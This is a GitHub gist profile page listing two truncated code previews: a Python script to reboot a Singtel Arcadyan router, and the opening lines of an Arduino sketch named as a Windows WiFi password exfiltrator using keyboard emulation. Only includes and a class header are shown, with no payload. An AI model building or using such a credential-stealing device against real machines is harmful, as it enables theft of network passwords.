Skip to content

Instantly share code, notes, and snippets.

View kaiongit's full-sized avatar
🌴
On vacation

kaiongit

🌴
On vacation
View GitHub Profile
@kaiongit
kaiongit / reboot.py
Created March 31, 2022 08:06
Simple python script to reboot a Singtel issued Arcadyan AC Elite (AC1900) router
import hashlib
import requests
import base64
from urllib import parse
import re
class ArcRouter:
SCHEME = "http"
BASE_HEADERS = {
@kaiongit
kaiongit / eeprom-wifi-exfiltrator.ino
Created December 9, 2020 05:02
Windows WiFi passwords exfiltrator with EEPROM for 32u4 based Arduinos
#include "Keyboard.h"
#include "EEPROM.h"
#define KEYPRESS_DELAY 1 //msec
class DKeyboard{
private:
int keypressDelay = KEYPRESS_DELAY;
public: